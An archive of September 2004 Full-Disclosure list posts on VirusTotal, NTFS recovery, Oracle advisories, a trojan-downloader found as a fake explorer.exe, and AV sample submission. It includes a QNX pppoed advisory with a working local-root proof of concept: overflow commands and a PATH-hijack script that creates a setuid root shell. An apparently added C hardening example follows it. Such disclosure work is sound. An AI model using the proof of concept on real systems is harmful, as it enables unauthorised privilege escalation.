Re: [Full-Disclosure] Multi-vendor AV scanning without sending a sample

2004-09-03 Thread Axel Pettinger
John LaCour wrote:
> 
> If you don't want to use something like www.virustotal.com to scan
> suspected malware, then use the activex web based scanners of
> several vendors.  It's a bit more time consuming, but then you
> don't end up sending anyone your sample.
> 
> Here's a list (a few actually do require you to upload the sample).
> If anyone knows of any others, please send me the info.

Have a look at the following site - you'll have to scroll down a bit to
the "Online Anti-Virus Scanners" section:

http://claymania.com/anti-virus.html

Regards,
Axel Pettinger

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Re: About VirusTotal/Hispasec

2004-09-03 Thread Über GuidoZ
Very happy to see your reply Bernardo. =) That's how I imagined
VirusTotal.com to be... it's a shame that some people insist on
bashing a valid service. I can certainly understand, and appreciate,
2nd guessing something that seems too good to be true. However, instead
of bad mouthing it right out of the box, ask the questions first. THEN
give the conspiracy theories. =D

Best of luck expanding VirusTotal.com. It's an awesome service that
has saved me many headaches in times of need.

-- 
Peace. ~G


On Fri, 3 Sep 2004 21:11:12 +0200, Bernardo Quintero
<[EMAIL PROTECTED]> wrote:
> > I'm also rather suspicious of your promotion of Virus Total.  Hispasec,
> > as far as I can tell (Spanish being something I have to have translated
> > via online services), has no antivirus or similar product of its own,
> 
> Obviously, we don't develop any antivirus product. We don't either
> distribute any antivirus solution or have interest in any specific AV
> vendor.
> 
> > yet it has set up, and some folk seem to be promoting, what is
> > effectively a sample collection mechanism.  I've also heard vague
> 
> Sincerely, we have no hidden intentions, and we don't have any business
> model behind VirusTotal, but we accept suggestions in that field ;)
> 
> VirusTotal is more a system that lets users have a second opinion about
> suspicious files that, for one reason or another, are not detected as
> 'dangerous' by the AV they have installed in their system.
> 
> The program was developed as an internal-use tool for our laboratory to
> keep monitoring the update responses of AV engines against new malware,
> knowing that way exactly when they started to detect them.
> We're frequently asked for consulting about antivirus solutions, and
> we've been doing tests and studies in that field for technical magazines
> and companies for years.
> 
> Once we had it working in our lab, we thought it would be something
> useful for the community for having that second opinion I told you
> about. We made it a lovely wrapper (the web interface) and we offered it
> as a free service.
> 
> About files received, we've developed a distribution system for giving
> those files to AV vendors that don't detect a supposedly infected file
> (or that detect it with heuristics). This system is not active now,
> and I hope to make a formal proposal (free) and have consensus with
> them to see if they like that system. If we finally activate that system,
> VirusTotal will accept new commands so users could choose if they
> want those files to be sent to AV vendors or not.
> 
> I don't really see any problem about suspicious binaries, but in the
> case of documents I understand that users should be able to use the
> service and make it knowing that file is not going to be sent to any lab
> (a matter of privacy). I think the best way is to keep that
> 'not-sending' option, so a user can decide anytime when they send a new
> file to make it enter the distribution system or not.
> 
> > rumblings that Hispasec/Virus Total does not have suitable licenses for
> > at least some of the scanners used in its service (and strongly suspect
> > that several of the AV vendors whose products are currently used would
> > not allow their products to be licensed for use in a service of the
> 
> No AV engine in VirusTotal is being used against the will of their
> vendors. We've asked permission from all developers themselves or
> distributors of those products here in Spain (just for geographical
> reasons, as it is our country). We're planning to increase the number of
> engines used (we're working on it) as other AV vendors have asked us to
> be part of the project with their solutions.
> 
> >- the different results could be due to differences in the update
> >  schedule at virustotal.com (some vendors offer their fastest updates
> >  only for premium licenses, which virustotal may not have).
> 
> VirusTotal is configured to look for new updates of all AVs in the
> system every 5 minutes. The updating system is basically the same that a
> registered user has in their own system. Obviously, AV vendors have
> stressed the importance of keeping that procedure as pure as possible for
> not being 'harmed' against others.
> 
> >- maybe some products are used with optimized settings (for example
> >  maximum heuristic detection) and others with default settings.
> 
> The parameters used in each engine are discussed with the developers, as
> we look for a behaviour as close as possible to the one a user could
> experience in their system.
> 
> >Unless for (a purely theoretical) example the website would use your
> >submission to infect others (perhaps with your address as sender) :-)
> 
> Definitely, that statement is close to paranoia, or there's simply
> interest in you to libel the service. Well, next week VirusTotal will
> accept files through a form that won't need any email to be given, so you
> can obtain the results directly on the web.
> 
> >I believe the intention may be good

[Full-Disclosure] [RLSA_01-2004] QNX PPPoEd local root vulnerabilities

2004-09-03 Thread Julio Cesar Fort
*** rfdslabs security advisory ***

Title: QNX PPPoEd local root vulnerabilities [RLSA_01-2004]
Versions: QNX RTP 6.1 (possibly others)
Vendor: http://www.qnx.com
Date: 02 Sep 2004

Author: Julio Cesar Fort 


1. Introduction

PPPoEd daemon is used to provide a PPPoE connection, such as DSL, for QNX
users. More information can be found at QNX Developer Support:
www.qnx.com/developers/docs/momentics621_docs/neutrino/utilities/p/pppoed.html
There are two vulnerabilities that can lead to local root access.

2. Details

#1 Buffer overflow

PPPoEd has multiple problems with bounds checking. Almost every flag with
oversized length crashes PPPoEd, overwriting memory. Once it is by default
suid owned by root, an attacker can execute arbitrary instructions to elevate
privileges. Above is an example to cause this overflow.

$ export overflow256='AAA(...)' (around 256 A's)
$ /usr/bin/pppoed -F $overflow256
Memory fault (core dumped)
$ /usr/bin/pppoed service=$overflow256
Memory fault (core dumped)
...
And it repeats in 'name', 'en', 'upscript', 'downscript', 'retries', 'timeout',
'scriptdetach', 'noscript', 'nodetach', 'remote_mac' and 'local_mac' flags.


#2 Old $PATH trick

PPPoEd calls "mount -T io-net npm-pppoe.so" without full path. If someone
wants to cheat PPPoEd and tricks it to execute his own malicious code, it can
be possible modifying $PATH. With this modification, '/usr/sbin/pppoed' will
simply execute 'mount' (hostile code) looking for it at /tmp directory.
Simple proof-of-concept steps are above.

$ cd /tmp
$ cat << _EOF_ > mount
#!/bin/sh
cp /bin/sh /tmp/rootshell
chown root /tmp/rootshell
chmod 4777 /tmp/rootshell
echo "Here comes your root shell"
_EOF_

$ chmod 755 mount
$ export PATH=/tmp:$PATH
$ /usr/sbin/pppoed
$ ls -la /tmp
-rwxr-xr-x1 sandimas users  88 Aug  25 2004 mount
-rwsrwxrwx1 root 100153384 Jun  22 2001 /tmp/rootshell
$ /tmp/rootshell
Here comes your root shell
# uname -a
QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86
#

3. Solution

rfdslabs tried to contact QNX Software Systems but no security staff e-mail
was found. No solution yet.

4. Timeline

27 Aug 2004: Vulnerabilities detected;
28 Aug - 01 Sep: Looking for QNX security staff contact e-mail: no success;
02 Sep 2004: Advisory written and sent to security mail-lists.

Thanks to DataStorm Technologies, Lucien Rocha and everyone at rfdslabs.

www.rfdslabs.com.br - computers, sex, human mind and more
Recife, PE, Brazil


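The two advisory items above describe a setuid daemon that copies oversized flag values without bounds checks and spawns `mount` through a PATH lookup. As an added example (not QNX's or rfdslabs' code), this C program shows the defensive counterparts a setuid helper should use: a length-checked argument copy that rejects rather than overruns, and a child exec by absolute path under a fixed, minimal environment. SERVICE_MAX, TRUSTED_PATH and the function names are assumptions chosen for illustration.

```c
/*
 * Hardening patterns for a setuid helper that accepts command-line flags and
 * spawns an external program. Example code written for this page; it is not
 * QNX's pppoed source. The 64-byte limit and the trusted PATH are assumptions.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define SERVICE_MAX 64   /* hypothetical maximum length of a service name */

/* Fixed search path handed to children; the caller's PATH is never used. */
static const char TRUSTED_PATH[] = "/sbin:/bin:/usr/sbin:/usr/bin";

/* Counterpart to issue #1: copy a flag value into a fixed-size buffer only if
 * it fits (terminator included); otherwise reject it instead of overrunning
 * the buffer or silently truncating. Returns 0 on success, -1 if too long. */
int safe_copy_arg(char *dst, size_t dstlen, const char *src)
{
    size_t n = 0;
    while (n < dstlen && src[n] != '\0')
        n++;
    if (n >= dstlen)          /* no room for the NUL: would overflow */
        return -1;
    memcpy(dst, src, n + 1);  /* n + 1 includes the terminator */
    return 0;
}

/* Counterpart to issue #2, part 1: give children a minimal environment whose
 * PATH is a compile-time constant, so an attacker-controlled PATH (e.g. one
 * starting with /tmp) never reaches them. Returns a static, NULL-terminated
 * envp array. */
char **minimal_env(void)
{
    static char pathvar[sizeof "PATH=" + sizeof TRUSTED_PATH];
    static char *env[2];
    snprintf(pathvar, sizeof pathvar, "PATH=%s", TRUSTED_PATH);
    env[0] = pathvar;
    env[1] = NULL;
    return env;
}

/* Counterpart to issue #2, part 2: run a helper by absolute path with execve()
 * instead of system()/execvp(), so neither PATH nor a shell is consulted to
 * find it. Returns the child's exit status, or -1 on refusal or error. */
int run_trusted(const char *abs_path, char *const argv[])
{
    pid_t pid;
    int status;

    if (abs_path == NULL || abs_path[0] != '/')
        return -1;            /* refuse anything that would need a PATH lookup */

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, minimal_env());
        _exit(127);           /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    char service[SERVICE_MAX];
    /* The first argument stands in for a "service=<value>" flag. */
    const char *value = (argc > 1) ? argv[1] : "pppoe-service";
    char *const helper_argv[] = {
        "sh", "-c", "echo helper ran with PATH=$PATH", NULL
    };

    if (safe_copy_arg(service, sizeof service, value) != 0) {
        fprintf(stderr, "service name too long (max %d bytes)\n", SERVICE_MAX - 1);
        return 1;
    }
    printf("service=%s\n", service);
    return run_trusted("/bin/sh", helper_argv) == 0 ? 0 : 1;
}
```

Passing a value of a few hundred characters as the first argument exercises the rejection path that the advisory's oversized-flag crash would otherwise take.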


Re: [Full-Disclosure] Restoring a NTFS partition?

2004-09-03 Thread kf_lists
sleuthkit and autopsy are your friend...
http://www.sleuthkit.org/autopsy/
-KF
ASB wrote:
> It is possible to restore data after a format regardless of the filesystem.
> This is not an NTFS issue, nor a Windows issue for that matter.
> -ASB
> On Sat, 4 Sep 2004 07:38:13 +1000 (EST), Craig Bumpstead
> <[EMAIL PROTECTED]> wrote:
> > Hi,
> > I have heard that it is possible to restore a NTFS
> > partition even though it has been formatted and
> > software re-installed?
> > Apparently this is because of a flaw/design in NTFS.
> > Does anyone know about this?
> > Cheers,
> > Craig



Re: [Full-Disclosure] The Hacker's Manifesto Reloaded

2004-09-03 Thread James Tucker
Lollery.


On Fri, 3 Sep 2004 08:33:10 -0700 (PDT), the entrepreneur
<[EMAIL PROTECTED]> wrote:
> James,
> A nice manifesto indeed. But in no way does it
> correlate to the one which I have written (or
> probably modified). Maybe the sarcasm is not
> noticeable, maybe you missed it, maybe because we are
> different people altogether.
> Well, I am here because I am anti-authoritative, a
> negated personality (I hate to call it that because
> the fundamental idea of its emergence was this growth
> of negative activity, this was root for pete's sake!).
> Maybe you suppressed your impulses, or are vehemently
> denying it.
> Well it's synonymous to rap songs, they are violent,
> they are bad, but we listen, with that fetish look in
> eyes. Maybe you listen to it too or maybe not, but
> there is always one vantage point where you blow your
> steam, about your very inner conscience.
> My conscience was the conscience of this Manifesto,
> it manifests, the "hummm..." sound some people will do
> when they read it. It's for them.
> If not for them, lest it's for me.
> EULA might not cover it (how can you miss the pun
> there?), but the First Amendment will. hehe.
> 
> Am I spared?
> 
> -Regards
> The Entrepreneur
> --- James Tucker <[EMAIL PROTECTED]> wrote:
> 
> > A short piece of food for thought for all you hackers out there. This
> > is not an attack on your livelihood, this is merely a point for your
> > consideration.
> >
> > It (the manifesto) does not explain why this information is relevant
> > for me to read. Or maybe I am unable to understand the part that does;
> > if so please teach this willing student.
> >
> > Your manifesto seems largely similar to those written by many others.
> > The attacks upon the security industry (which is required, whether the
> > techs are good or not is a different matter) are largely unqualified.
> > Please do not forget that businesses are formed due to the needs of
> > other businesses or people and they serve others; this leads in a
> > chain-like manner back to the industries you would choose not to
> > attack.
> >
> > Tell me how would you feel if you successfully stole enough money that
> > you crashed an economy and power generation also stopped. An unreal
> > scenario I know, but tone this back down to reality, and you realise
> > that the things you are using are also directly related to the things
> > you are trashing. In essence you are destroying your own world.
> >
> > It is business that makes computers, it is power that feeds the
> > factories, it is these people's money that pays the employees. The
> > employees need health insurance if they want to survive, hospitals
> > need their equipment, which in turn requires design, logistics for
> > movement of physical items. The logistics companies need ISPs for
> > their communications infrastructure, and banks to manage their money.
> > The trail goes on. Do you not realise that many of the places you
> > attack are merely part of the chain of business which supports the
> > world that you love?
> >
> > A final point to further this, how far are you willing to go in
> > causing people inconvenience? Every day people commit suicide due to
> > stress caused to them in their business lives. Shutting down
> > communications media, or any other business could have this effect (or
> > at least contribute). Even furthermore there are situations where your
> > actions may more directly affect the safety of individuals. Continuing
> > to do so may then be compared to attempted murder. Still think you
> > have any moral high ground?
> >
> > Finally the word manifesto means "a declaration of intent". I was
> > unable to see any intended actions stated. In fact what I read more
> > resembled a boast of money gained by actions already performed, and
> > insult of lesser hackers and security professionals. For someone who
> > should have a clear understanding of the need for accurate
> > understanding of language (most important when the language is dealt
> > with on a purely logical and explicit basis as with a computer system)
> > you seem to not care so much about the accuracy of your written
> > language.
> >
> > ---
> >
> > I am a student of security and this is my manifesto. I intend to have
> > any hacker who tries to attack me for trying to provide an explanation
> > of my point of view to them, thrown into jail for the longest sentence
> > available under the laws of the country in which they committed their
> > crime. This is my statement of intent, my manifesto, and it needs no
> > end user license agreement or copyright. It is not unreasonable, it is
> > not a declaration of war, it is a statement accompanying a point for
> > discussion, nothing more.
> >
> > What do you think?
> >
> >
> > On Fri, 3 Sep 2004 05:45:19 -0700 (PDT), the
> >

Re: [Full-Disclosure] Restoring a NTFS partition?

2004-09-03 Thread ASB
It is possible to restore data after a format regardless of the filesystem.

This is not an NTFS issue, nor a Windows issue for that matter.

-ASB

On Sat, 4 Sep 2004 07:38:13 +1000 (EST), Craig Bumpstead
<[EMAIL PROTECTED]> wrote:
> Hi,
> 
> I have heard that it is possible to restore a NTFS
> partition even though it has been formatted and
> software re-installed?
> Apparently this is because of a flaw/design in NTFS.
> 
> Does anyone know about this?
> 
> Cheers,
> Craig



Re: [Full-Disclosure] [SHATTER Team Security Alert] Multiple vulnerabilities in Oracle Database Server

2004-09-03 Thread Cesar

Most of the vulns are almost one year old. We don't
steal anything.

BTW: finding vulns in Oracle products is like fishing
in a pool full of fishes. No big deal.


Cesar.
--- xbud <[EMAIL PROTECTED]> wrote:

> Actually this sounds like someone stole Litchfield's
> research - but what do I 
> know.  Just seems like too much coincidence since
> his last talk dealt with 
> procedure based vulns.
> 
> 






[Full-Disclosure] Restoring a NTFS partition?

2004-09-03 Thread Craig Bumpstead
Hi,

I have heard that it is possible to restore a NTFS
partition even though it has been formatted and
software re-installed?
Apparently this is because of a flaw/design in NTFS.

Does anyone know about this?

Cheers,
Craig




SV: [Full-Disclosure] [SHATTER Team Security Alert] Multiple vulnerabilities in Oracle Database Server

2004-09-03 Thread Peter Kruse
Hi,

>Actually this sounds like someone stole Litchfield's research -
>but what do I
>know.  Just seems like too much coincidence since his last talk dealt with
>procedure based vulns.

No, these are separate issues.

This is a coordinated update that fixes multiple vulnerabilities in Oracle.
Details from NGSSoftware won't be disclosed until after 3 months. However,
the advisory published by Application Security Inc. contains sufficient data
that could be abused to start exploiting Oracle databases immediately.

Kind regards
Peter Kruse
http://www.csis.dk



Re: [Full-Disclosure] [SHATTER Team Security Alert] Multiple vulnerabilities in Oracle Database Server

2004-09-03 Thread xbud
Actually this sounds like someone stole Litchfield's research - but what do I 
know.  Just seems like too much coincidence since his last talk dealt with 
procedure based vulns.


On Thursday 02 September 2004 08:32 am, Mark Shirley wrote:
> Now that's what I've been waiting for :)
>
> On Wed, 01 Sep 2004 19:20:25 -0400, SHATTER <[EMAIL PROTECTED]> wrote:
> > AppSecInc Advisory: Multiple vulnerabilities in Oracle Database Server
> >
> > Date:
> > August 31, 2004
> >
> > Detailed Information Provided Online At:
> > http://www.appsecinc.com/resources/alerts/oracle/2004-0001/
> >
> > Credit:
> > These vulnerabilities were researched and discovered by Cesar Cerrudo
> > and Esteban Martinez Fayo of Application Security, Inc.
> > (www.appsecinc.com)
> >
> > Risk Level:
> > High
> >
> > Abstract:
> > Multiple buffer overflow and denial of service (DoS) vulnerabilities
> > exist in the Oracle Database Server which allow database users to take
> > complete control over the database and optionally cause denial of
> > service.
> >
> > The official advisory from Oracle Corporation can be obtained from:
> > http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf
> >
> > Details:
> >
> > http://www.appsecinc.com/resources/alerts/oracle/2004-0001/
> >
> > #1 - Buffer overflow in public procedure DROP_SITE_INSTANTIATION of
> > DBMS_REPCAT_INSTANTIATE package
> >
> > #2 - Buffer overflow in public function INSTANTIATE_OFFLINE of
> > DBMS_REPCAT_INSTANTIATE package
> >
> > #3 - Buffer overflow in public function INSTANTIATE_ONLINE of
> > DBMS_REPCAT_INSTANTIATE package
> >
> > #4 - Buffer overflow on "gname" parameter on procedures of Replication
> > Management API Packages
> >
> > #5 - Buffer overflow on "sname" and "oname" parameters on procedures of
> > DBMS_REPCAT package
> >
> > #6 - Buffer overflow on "type" parameter on procedures of DBMS_REPCAT
> > package
> >
> > #7 - Buffer overflow on "gowner" parameter on procedures of the
> > DBMS_REPCAT package
> >
> > #8 - Buffer overflow on "operation" parameter on procedures of
> > DBMS_REPCAT package
> >
> > #9 - Buffer overflow in procedure CREATE_MVIEW_REPGROUP of DBMS_REPCAT
> > package
> >
> > #10 - Buffer overflow in procedure GENERATE_REPLICATION_SUPPORT of
> > DBMS_REPCAT package
> >
> > #11 - Buffer overflow in procedures REGISTER_USER_REPGROUP and
> > UNREGISTER_USER_REPGROUP of DBMS_REPCAT_ADMIN package
> >
> > #12 - Buffer overflow in functions INSTANTIATE_OFFLINE,
> > INSTANTIATE_ONLINE and procedure DROP_SITE_INSTANTIATION of
> > DBMS_REPCAT_RGT package
> >
> > #13 - Buffer overflow on TEMPFILE parameter
> >
> > #14 - Buffer overflow on LOGFILE parameter
> >
> > #15 - Buffer overflow on CONTROLFILE parameter
> >
> > #16 - Buffer overflow on FILE parameter
> >
> > #17 - Buffer overflow in Interval Conversion Functions
> >
> > #18 - Buffer overflow in String Conversion Function
> >
> > #19 - Buffer overflow in CTX_OUTPUT Package Function
> >
> > #21 - Buffer overflow on DATAFILE parameter
> >
> > #22 - Buffer overflow in DBMS_SYSTEM package function
> >
> > #24 - Buffer overflow on "fname" parameter of the DBMS_REPCAT* packages
> >
> > #25 - Buffer overflow on procedures of the Replication Management API
> > packages
> >
> > #26 - Heap based buffer overflow Vulnerability in Oracle 10g iSQL*PLus
> > Service
> >
> > #27 - Buffer overflow in procedure AQ_TABLE_DEFN_UPDATE of
> > DBMS_AQ_IMPORT_INTERNAL package
> >
> > #28 - Buffer overflow in procedure VERIFY_QUEUE_TYPES_GET_NRP of
> > DBMS_AQADM package
> >
> > #29 - Buffer overflow in procedure VERIFY_QUEUE_TYPES_NO_QUEUE of
> > DBMS_AQADM package
> >
> > #30 - Buffer overflow in procedure VERIFY_QUEUE_TYPES of DBMS_AQADM_SYS
> > package
> >
> > #31 - Buffer overflow in procedure PARALLEL_PUSH_RECOVERY of
> > DBMS_DEFER_INTERNAL_SYS package
> >
> > #32 - Buffer overflow in procedure ENABLE_PROPAGATION_TO_DBLINK of
> > DBMS_DEFER_REPCAT package
> >
> > #33 - Buffer overflow in procedure DISABLE_RECEIVER_TRACE of
> > DBMS_INTERNAL_REPCAT package
> >
> > #34 - Buffer overflow in procedure ENABLE_RECEIVER_TRACE of
> > DBMS_INTERNAL_REPCAT package
> >
> > #35 - Buffer overflow in procedure VALIDATE of DBMS_INTERNAL_REPCAT
> > package
> >
> > #36 - Buffer overflow in procedure DIFFERENCES of DBMS_RECTIFIER_DIFF
> > package
> >
> > #37 - Buffer overflow in procedure ADD_COLUMN of DBMS_REPCAT_RQ package
> >
> > #39 - Buffer overflow in procedure IS_MASTER of DBMS_REPCAT_UTL package
> >
> > #40 - Buffer overflow in procedure PUSHDEFERREDTXNS of LTUTIL package
> >
> > #41 - Buffer overflow in public procedure SDO_CODE_SIZE of MD2 package
> >
> > #42 - Buffer overflow in public procedure VALIDATE_GEOM of MD2 package
> >
> > #43 - Buffer overflow in public procedure SDO_CODE_SIZE of SDO_ADMIN
> > package
> >
> > #44 - Buffer overflow in procedure SUBINDEXPOPULATE of DRIDDLR package
> >
> > To determine if you are vulnerable, please download AppDetective from:
> >
> > http://www.appsecinc.com/products/appdetectiv

Re: [Full-Disclosure] Where to submit a suspected trojan or virus?

2004-09-03 Thread Scenobro
Harlan Carvey wrote:
> The fact that there's a copy of this Explorer.exe in
> System32 may be an issue.
> Was there an application running?  Was there a
> Registry entry related to this file?  If so, which
> one?  How about another autostart location?
> What do you mean by "I believe take precedence over
> the real explorer.exe"?  how so?

Well, actually I discovered it using Autoruns from Sysinternals.
The registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
had simply the value "Explorer.exe" and Autoruns showed as the image 
path: "c:\windows\system32\explorer.exe"
Autoruns also showed the icon of the file and it was the wrong icon: it 
had the icon of Internet Explorer, not Explorer.
This led me to search for the real explorer.exe and Google confirmed 
that the right location is c:\windows.
Once I deleted the fake explorer.exe from system32, Autoruns showed the 
right image path and the right icon.
Today I sent it to Kaspersky Lab and they said it's a simple 
trojan-downloader.
I think that the fake explorer.exe calls the real one after having 
downloaded its trojan.
The problem now is that the file it downloads is no longer available (it 
was at "http://www.getupdate.com/TestDownload.exe") and I can't tell if 
I have downloaded it and in such case what it does...



Re: [Full-Disclosure] (no subject) (try using a friggin subject line...)

2004-09-03 Thread KF_lists
I'm Rick James bitch!
-KF
Adam wrote:
> who are you friggen Dr Evil?
> On Friday 13 August 2004 07:04 pm, KF_lists wrote:
> > Insert subject here ^
> > -KF


[Full-Disclosure] Finger Google v1.0 released

2004-09-03 Thread shadown
Hi,

  Finger Google v1.0 is a very simple tool, but as many of my friends
asked me to post it, I've done it.
  This tool searches recursively in Google for mail accounts and gives
them to you in user-list format.
  This is somewhat useful when pen-testing and you want to get
account names passively.
  I hope you enjoy it.
   http://hack3rs.org/~shadown/Twister
  Cheers.

-- 
Sergio Alvarez
Security, Research & Development
IT Security Consultant
email: [EMAIL PROTECTED]



Re: [Full-Disclosure] (no subject) (try using a friggin subject line...)

2004-09-03 Thread Adam

who are you friggen Dr Evil?

On Friday 13 August 2004 07:04 pm, KF_lists wrote:
> Insert subject here ^
>
> -KF
>


Re: [Full-Disclosure] Re: Security & Obscurity: physical-world analogies

2004-09-03 Thread gadgeteer
On Fri, Sep 03, 2004 at 08:06:49AM -0500, Frank Knobbe ([EMAIL PROTECTED]) wrote:
> On Fri, 2004-09-03 at 03:04, [EMAIL PROTECTED] wrote:
> > > Feel free to play through the same scenario with a wall where "dead"
> > > people-packets get purposefully deployed in front of the wall until the
> > > last people-packet can climb the packet mountain and pass over the wall.
> >  
> > Unfortunately, this tactic has been used in warfare.  It has been referred
> > to as the "human wave" attack. :-(
> 
> But it as a bunch of different people packets. In cyber space it is the
> copy of one. In the real world you might exhaust your people-packet
> resources, in cyber space you don't.  :)
> 
> No we're leading discussion down  a wrong path again due to a flawed
> analogy :)

When I put on my 'purist' hat I agree with your extreme position
regarding analogies.  Even without the hat I agree when the subject
matter becomes advanced and specific.

OTOH, if a person were to take this purist position and walk into a
CEO's office and tell him that he is not smart enough to understand and
should therefore give free rein, that person is going to walk back out
the door looking for a new gig because they will not be working there.

It has been my experience to 1) never talk down to the audience and 2)
stay away from analogies with loads of baggage because it leads them to
falsely think that they have gained deep insight.

An example from physics would be Einstein's clock tower thought
experiment.  A familiar setting (without heavy emotional baggage) but the
whole experiment takes place orthogonally to that setting (on a train).
Then there is the cat in a box and raisins in oatmeal and we are still
talking about the same realm.  We have an entire century as an example
where physicists worked with the invisible through analogy.

In the end, the claim analogies can not be used is to admit a poverty of
creativity.  "We can not explain this to you because we are not bright
enough to think of a good set of analogies."  Ouch.
-- 
Chief Gadgeteer
Elegant Innovations



[Full-Disclosure] About VirusTotal/Hispasec

2004-09-03 Thread Bernardo Quintero
> I'm also rather suspicious of your promotion of Virus Total.  Hispasec,
> as far as I can tell (Spanish being something I have to have translated
> via online services), has no antivirus or similar product of its own,

Obviously, we don't develop any antivirus product. We don't either 
distribute any antivirus solution or have interest in any specific AV 
vendor.

> yet it has set up, and some folk seem to be promoting, what is
> effectively a sample collection mechanism.  I've also heard vague

Sincerely, we have no hidden intentions, and we don't have any business 
model behind VirusTotal, but we accept suggestions in that field ;)

VirusTotal is more a system that lets users have a second opinion about 
suspicious files that, for one reason or another, are not detected as 
'dangerous' by the AV they have installed in their system.

The program was developed as an internal-use tool for our laboratory to 
keep monitoring the update responses of AV engines against new malware, 
knowing that way exactly when they started to detect them.
We're frequently asked for consulting about antivirus solutions, and 
we've been doing tests and studies in that field for technical magazines 
and companies for years.

Once we had it working in our lab, we thought it would be something 
useful for the community for having that second opinion I told you 
about. We made it a lovely wrapper (the web interface) and we offered it 
as a free service.

About files received, we've developed a distribution system for giving 
those files to AV vendors that don't detect a supposedly infected file 
(or that detect it with heuristics). This system is not active now, 
and I hope to make a formal proposal (free) and have consensus with
them to see if they like that system. If we finally activate that system,
VirusTotal will accept new commands so users could choose if they
want those files to be sent to AV vendors or not.

I don't really see any problem about suspicious binaries, but in the 
case of documents I understand that users should be able to use the 
service and make it knowing that file is not going to be sent to any lab 
(a matter of privacy). I think the best way is to keep that 
'not-sending' option, so a user can decide anytime when they send a new 
file to make it enter the distribution system or not.

> rumblings that Hispasec/Virus Total does not have suitable licenses for
> at least some of the scanners used in its service (and strongly suspect
> that several of the AV vendors whose products are currently used would
> not allow their products to be licensed for use in a service of the

No AV engine in VirusTotal is being used against the will of their 
vendors. We've asked permission from all developers themselves or 
distributors of those products here in Spain (just for geographical 
reasons, as it is our country). We're planning to increase the number of 
engines used (we're working on it) as other AV vendors have asked us to 
be part of the project with their solutions.

>- the different results could be due to differences in the update 
>  schedule at virustotal.com (some vendors offer their fastest updates
>  only for premium licenses, which virustotal may not have). 

VirusTotal is configured to look for new updates of all AVs in the 
system every 5 minutes. The updating system is basically the same that a 
registered user has in their own system. Obviously, AV vendors have 
stressed the importance of keeping that procedure as pure as possible for 
not being 'harmed' against others.

>- maybe some products are used with optimized settings (for example 
>  maximum heuristic detection) and others with default settings.

The parameters used in each engine are discussed with the developers, as 
we look for a behaviour as close as possible to the one a user could 
experience in their system.

>Unless for (a purely theoretical) example the website would use your
>submission to infect others (perhaps with your address as sender) :-)

Definitively, that statement is close to paranoia, or there's simply an
interest on your part in libelling the service. Well, next week VirusTotal will
accept files through a form that won't need any email to be given, so you
can obtain the results directly on the web.

>I believe the intention may be good but I have some lingering
>suspicion of *free* services that have you send in binaries; maybe
>the elaborate works of vx traders.  (cue the conspiracy theories)

Obviously not.


Do you have any other suspicion or vague rumour? I think this kind of
thing can make people on the list get bored, so you can use the email
we offer ([EMAIL PROTECTED]) for answering all kinds of requests (it's
only a suggestion). With time, and using the most usual questions and
answers received through that email, we're going to publish a FAQ on the
site itself.

Of course, all criticism and suggestions are welcome so we can improve the
service or include new features.

Thanks,

Bernardo Quintero
[EMAIL PROTECTED]
Hispasec

RE: [Full-Disclosure] Where to submit a suspected trojan or virus?

2004-09-03 Thread DSardina
[EMAIL PROTECTED] 

Add the trojan to a zip file and send it away. Nothing accepted over 1 MB.



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of John LaCour
Sent: Friday, September 03, 2004 1:32 PM
To: Scenobro; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Where to submit a suspected trojan or virus?


Here's my list of vendor submission addresses, many of which initially came
from Nick Fitzgerald.

[EMAIL PROTECTED]
avsubmit.symantec.com
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]


Most of these want you to send it in a password protected zip file with a
password 'infected'.  Some of them want the password to be 'virus'.  I tend
to just send two zip files to everyone on my distribution list.

If anyone knows of any others, I'd appreciate the info.

-John

> -Original Message-
> From: Scenobro [mailto:[EMAIL PROTECTED]
> Sent: Thursday, September 02, 2004 9:00 PM
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Where to submit a suspected trojan 
> or virus?
> 
> 
> I found an explorer.exe in my system32 folder which I believe takes
> precedence over the real explorer.exe located in c:\windows.
> It's a 92K file that seems to be a Visual Basic program. Among the
> strings contained in it there is a "C:\TestDL.exe" which I didn't find
> on my disk and a URL "http://www.getupdate.com/TestDownload.exe" which
> doesn't exist (the home page of that site is a text file containing only
> "SB2").
> I sent the file to virustotal.com and they found nothing.
> Where can I send this file for analysis?
> 



RE: [Full-Disclosure] Where to submit a suspected trojan or virus?

2004-09-03 Thread Donahue, Pat
Hi Scenobro,

I've had success sending the file to McAfee's AVERT WebImmune
(http://www.webimmunite.net). You can register as a new user and submit
through the web interface, or you can simply e-mail the file to
[EMAIL PROTECTED]. I'd recommend registering as they will provide
you with the scan result immediately. Additionally, if you use McAfee,
they will provide you with updated virus definition files to clean the
machine.

Best of luck,
Pat

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Kyle
Maxwell
Sent: Friday, September 03, 2004 12:23 PM
To: Scenobro
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Where to submit a suspected trojan or
virus?

On Fri, 03 Sep 2004 06:00:27 +0200, Scenobro <[EMAIL PROTECTED]>
wrote:
> I found an explorer.exe in my system32 folder which I believe takes
> precedence over the real explorer.exe located in c:\windows.
> It's a 92K file that seems to be a Visual Basic program. Among the
> strings contained in it there is a "C:\TestDL.exe" which I didn't find
> on my disk and a URL "http://www.getupdate.com/TestDownload.exe" which
